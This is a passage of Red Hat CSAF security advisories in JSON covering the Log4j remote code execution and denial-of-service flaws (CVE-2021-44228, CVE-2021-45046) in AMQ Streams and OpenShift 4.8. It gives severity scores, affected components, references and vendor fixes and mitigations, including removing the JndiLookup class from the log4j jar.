"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5138.json" } ], "title": "Red Hat Security Advisory: Red Hat AMQ Streams 1.8.4 release and security update", "tracking": { "current_release_date": "2024-12-12T01:18:37+00:00", "generator": { "date": "2024-12-12T01:18:37+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5138", "initial_release_date": "2021-12-14T21:49:01+00:00", "revision_history": [ { "date": "2021-12-14T21:49:01+00:00", "number": "1", "summary": "Initial version" }, { "date": 
"2021-12-14T21:49:01+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:18:37+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat AMQ Streams 1.8.4", "product": { "name": "Red Hat AMQ Streams 1.8.4", "product_id": "Red Hat AMQ Streams 1.8.4", "product_identification_helper": { "cpe": "cpe:/a:redhat:amq_streams:1" } } } ], "category": "product_family", "name": "Red Hat JBoss AMQ" } ], "category": "vendor", "name": "Red Hat" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. 
Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat AMQ Streams 1.8.4" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": 
"https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T21:49:01+00:00", "details": "Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.\n\nThe References section of this erratum contains a download link (you must log in to download the update).", "product_ids": [ "Red Hat AMQ Streams 1.8.4" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5138" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from 
the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "Red Hat AMQ Streams 1.8.4" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "Red Hat AMQ Streams 1.8.4" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" } ] }
rhsa-2021_5108
Vulnerability from csaf_redhat
Notes
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Critical" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "Red Hat OpenShift Container Platform release 4.8.z is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. 
and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5108", "url": "https://access.redhat.com/errata/RHSA-2021:5108" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#critical", "url": "https://access.redhat.com/security/updates/classification/#critical" }, { "category": "external", "summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5108.json" } ], "title": "Red Hat Security Advisory: OpenShift Container Platform 4.8.z security update", "tracking": { "current_release_date": "2024-12-12T01:17:10+00:00", "generator": { "date": "2024-12-12T01:17:10+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.3" } }, "id": "RHSA-2021:5108", "initial_release_date": "2021-12-14T15:09:31+00:00", "revision_history": [ { "date": "2021-12-14T15:09:31+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-14T15:09:31+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-12-12T01:17:10+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat OpenShift Container Platform 
4.8", "product": { "name": "Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8", "product_identification_helper": { "cpe": "cpe:/a:redhat:openshift:4.8::el8" } } } ], "category": "product_family", "name": "Red Hat OpenShift Enterprise" }, { "branches": [ { "category": "product_version", "name": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64", "product": { "name": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64", "product_id": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hive\u0026tag=v4.8.0-202112132154.p0.g57dd03a.assembly.stream" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "product": { "name": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "product_id": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.8.0-202112132154.p0.g0d7ecfb.assembly.stream" } } }, { "category": "product_version", "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "product": { "name": 
"openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "product_identification_helper": { "purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.8.0.202112132154.p0.g0d7ecfb.assembly.stream-1" } } } ], "category": "architecture", "name": "amd64" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" }, { "category": "default_component_of", "full_product_name": { "name": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64" }, "product_reference": "openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" }, { "category": "default_component_of", "full_product_name": { 
"name": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64 as a component of Red Hat OpenShift Container Platform 4.8", "product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" }, "product_reference": "openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64", "relates_to_product_reference": "8Base-RHOSE-4.8" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-12-10T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2030932" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue only affects log4j versions between 2.0 and 2.14.1. 
In order to exploit this flaw you need:\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n\nIn Red Hat OpenShift Logging the vulnerable log4j library is shipped in the Elasticsearch components. Because Elasticsearch is not susceptible to remote code execution with this vulnerability due to use of the Java Security Manager and because access to these components is limited, the impact by this vulnerability is reduced to Moderate.\n\nAs per upstream applications using Log4j 1.x may be impacted by this flaw if their configuration uses JNDI. However, the risk is much lower. This flaw in Log4j 1.x is tracked via https://access.redhat.com/security/cve/CVE-2021-4104 and has been rated as having Moderate security impact.\n\nCodeReady Studio version 12.21.1 was released containing a fix for this vulnerability.\n\nThe following products are NOT affected by this flaw and have been explicitly listed here for the benefit of our customers.\n- Red Hat Enterprise Linux\n- Red Hat Advanced Cluster Management for Kubernetes \n- Red Hat Advanced Cluster Security for Kubernetes\n- Red Hat Ansible Automation Platform (Engine and Tower)\n- Red Hat Certificate System\n- Red Hat Directory Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ 
"8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ], "known_not_affected": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T15:09:31+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this 
release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5108" }, { "category": "workaround", "details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. 
For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Critical" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled 
string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. 
\nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ], "known_not_affected": [ 
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T15:09:31+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are 
available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5108" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:3b7c190204a5ffb038b60b80e2096a7fab508dfeafdafeff71e755802265e70a_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:bae1a96311e2cac42a709789181bef11f7edf3b8c8feccbbc55552c2c14ea80d_amd64", "8Base-RHOSE-4.8:openshift4/ose-metering-hive@sha256:7518a86bfa6ccd14de18dcd833fa9dfee36a3707e70e9ffa2218264bac6e7794_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2023-05-01T00:00:00+00:00", "details": "CISA: 
https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)" } ] }
rhsa-2021_5106
Vulnerability from csaf_redhat
Notes
